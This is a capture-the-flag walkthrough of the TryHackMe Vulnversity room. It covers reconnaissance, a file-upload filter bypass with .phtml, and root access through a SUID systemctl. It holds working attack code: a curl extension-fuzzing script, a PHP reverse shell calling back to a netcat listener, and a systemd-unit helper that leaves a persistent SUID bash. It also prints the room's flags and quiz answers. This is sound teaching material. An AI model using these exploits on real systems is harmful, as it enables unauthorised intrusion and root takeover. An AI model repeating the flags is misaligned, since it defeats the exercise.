TryHackMe | Vulnversity [write-up]

Let’s walk through the Vulnversity room of tryhackme.com. This write-up is written for educational purposes. Please do not use it for cheating or skipping the tasks.

Task 1 Deploy the machine

Deploy the machine, and go to task 2.

Task 2 Reconnaissance

Run the provided nmap command. Read the text about the command and its usage.

Scan the box, how many ports are open? 6

What version of the squid proxy is running on the machine? 3.5.12

How many ports will nmap scan if the flag -p-400 was used? 400 (-p-400 is the range 1 to 400)

Using the nmap flag -n what will it not resolve? DNS (-n skips reverse DNS lookups of the targets)

What is the most likely operating system this machine is running? ubuntu

What port is the web server running on? 3333

Task 3 Locating directories using GoBuster

Run GoBuster with the command the room gives, and check its output.

What is the directory that has an upload form page? /internal/

Task 4 Compromise the webserver

What common file type, which you’d want to upload to exploit the server, is blocked? Try a couple to find out. .php

Run this attack, what extension is allowed? .phtml

(The room points at Burp Suite for this: capture the upload request, send it to Intruder, mark the extension in the filename as the payload position, and load a small hand-made list such as php, php3, php4, php5 and phtml. Only one candidate gets past the filter, which tells us the check is a blacklist of extensions rather than an allow-list of what an upload form should accept. The .phtml file still runs as PHP because Ubuntu's stock Apache PHP module configuration hands every name matching `.+\.ph(ar|p|tml)$` to the PHP handler.)
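To make the point concrete, here is an added example (not code from the room or this write-up): a constructed model of a blacklist extension filter next to an allow-list version, a loop that runs the same extension list through either check, and the equivalent loop against a live form with curl. The set of blocked extensions in the model, the form field names "file" and "submit", and the "Extension not allowed" rejection string are assumptions chosen to match what the room shows; confirm them in Burp before relying on the live probe.

```shell
#!/bin/sh
# Added example: why a blacklist of extensions fails and how to fuzz it.
# Everything below is constructed for illustration, not taken from the room.

EXTENSIONS="php php3 php4 php5 phtml"

# Constructed model of a blacklist filter. Which extensions it blocks is an
# assumption picked to reproduce the room's behaviour (.php rejected, .phtml accepted).
blacklist_check() {
  case "$1" in
    *.php|*.php3|*.php4|*.php5) echo blocked ;;
    *) echo allowed ;;
  esac
}

# Hardened alternative: allow-list of image extensions, lower-cased first so
# tricks like ".PHTML" do not slip past a case-sensitive comparison.
allowlist_check() {
  name=$(printf '%s' "$1" | tr 'A-Z' 'a-z')
  case "$name" in
    *.jpg|*.jpeg|*.png|*.gif) echo allowed ;;
    *) echo blocked ;;
  esac
}

# Run a base name through a check function with every extension and print the
# accepted ones. This is the offline version of the Intruder attack.
fuzz_extensions() {
  check=$1; base=$2; accepted=""
  for ext in $EXTENSIONS; do
    if [ "$($check "$base.$ext")" = allowed ]; then
      accepted="$accepted $ext"
    fi
  done
  echo "${accepted# }"
}

# Same loop against the real upload form. Field names and the rejection
# string are assumptions; usage: probe_live http://<VM_IP>:3333/internal/
probe_live() {
  url=$1
  for ext in $EXTENSIONS; do
    tmp=$(mktemp)
    printf '<?php echo "probe"; ?>' > "$tmp"
    body=$(curl -s -F "file=@$tmp;filename=probe.$ext" -F "submit=Submit" "$url")
    rm -f "$tmp"
    case "$body" in
      *"Extension not allowed"*) echo "$ext: blocked" ;;
      *) echo "$ext: accepted?" ;;
    esac
  done
}

echo "blacklist accepts: $(fuzz_extensions blacklist_check shell)"
echo "allow-list accepts: $(fuzz_extensions allowlist_check shell)"
```

Run offline, the blacklist model accepts exactly phtml and the allow-list accepts nothing from the list; that gap is the whole vulnerability. The allow-list still needs to be paired with a web server configuration that does not execute anything in the upload directory, since extension checks alone do not stop a renamed file from being served as PHP.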

After this task we will use a php web shell to create a reverse shell to our machine.

Let’s start the listener on our machine.

nc -lvnp 1234

Then on the AttackBox download the PHP reverse shell the room links to (pentestmonkey's php-reverse-shell.php) and set its $ip to the AttackBox's IP address and its $port to the port the listener is waiting on (1234 above).

Rename the file to a .phtml extension and upload it to the server.

Open the file in the browser at http://{VM_IP_ADDRESS}:3333/internal/uploads/php-reverse-shell.phtml and our reverse shell is alive.

Let’s look around!

$ ls /home
bill
$ ls /home/bill
user.txt
$ cat /home/bill/user.txt
8bd7992fbe8a6ad22a63361004cfcedb

At this point we have all the information to answer the remaining questions!

What is the name of the user who manages the webserver? bill

What is the user flag? 8bd7992fbe8a6ad22a63361004cfcedb

Task 5 Privilege Escalation

find / -type f \( -perm -4000 -o -perm -2000 \) -exec ls -l {} \; 2>/dev/null

On the system, search for all SUID files. What file stands out? /bin/systemctl

Become root and get the last flag (/root/root.txt) a58ff8579f0a9270368d33a9966c7fd5

Checking the systemctl binary on GTFOBins will give some results.

Reading the text we will have a basic understanding of the exploit.

GTFOBins' first line only creates a SUID copy of systemctl for demonstration, and /bin/systemctl is already SUID here, so it can be skipped; the rest of the exploit looks like this:

TF=$(mktemp).service
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "id > /tmp/output"
[Install]
WantedBy=multi-user.target' > $TF
./systemctl link $TF
./systemctl enable --now $TF

We can adapt it to our needs: the task wants the contents of /root/root.txt, so let's modify the systemd unit to read that file and redirect its contents to /tmp/output. ExecStart runs as root under systemd, and the file it creates gets root's default umask (0644), so our www-data shell can read it afterwards.

echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/output"
[Install]
WantedBy=multi-user.target' > $TF

The entire exploitation will look like the following:

TF=$(mktemp).service
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/output"
[Install]
WantedBy=multi-user.target' > $TF
/bin/systemctl link $TF
/bin/systemctl enable --now $TF
cat /tmp/output
a58ff8579f0a9270368d33a9966c7fd5
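The unit above runs a single command, so reading one file needs one round trip. As an added example (not code from the room or from GTFOBins), the same trick is wrapped below in a function that runs any command as root, and the payload goes beyond the flag to leave a SUID copy of bash behind, which gives a persistent root shell. The systemctl path and the RUN_EXPLOIT switch are assumptions; the block prints the unit it would use and only talks to systemctl when RUN_EXPLOIT=1 is set on the target.

```shell
#!/bin/sh
# Added example: generic "run as root via SUID systemctl" helper.
# Not part of the room; SYSTEMCTL and RUN_EXPLOIT are assumed names.

SYSTEMCTL=${SYSTEMCTL:-/bin/systemctl}

# Build a oneshot unit whose ExecStart runs the given command through /bin/sh -c.
# The command is embedded in double quotes, so keep unescaped double quotes out of it.
make_unit() {
  printf '[Service]\nType=oneshot\nExecStart=/bin/sh -c "%s"\n[Install]\nWantedBy=multi-user.target\n' "$1"
}

# Link and enable the unit through the SUID binary; PID 1 then runs ExecStart as root.
# A fresh mktemp name is used per call because enabling an already-enabled unit
# does not run it again.
root_exec() {
  unit=$(mktemp).service
  make_unit "$1" > "$unit"
  "$SYSTEMCTL" link "$unit" && "$SYSTEMCTL" enable --now "$unit"
}

# Payload that outlives a single command: a SUID copy of bash. Run it with -p so
# bash keeps the effective uid 0 instead of dropping it.
ROOTSHELL_CMD='cp /bin/bash /tmp/rootbash; chmod u+s /tmp/rootbash'

# Dry run by default so the script can be read anywhere; on the target: RUN_EXPLOIT=1 sh this.sh
make_unit "$ROOTSHELL_CMD"
if [ "${RUN_EXPLOIT:-0}" = 1 ]; then
  root_exec "$ROOTSHELL_CMD" && /tmp/rootbash -p -c 'id; cat /root/root.txt'
fi
```

Each call to root_exec leaves an enabled unit symlinked under /etc/systemd/system, so on a real engagement disable and remove those units (and the SUID binary in /tmp) once you are done.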

After answering the question we are done with this room.
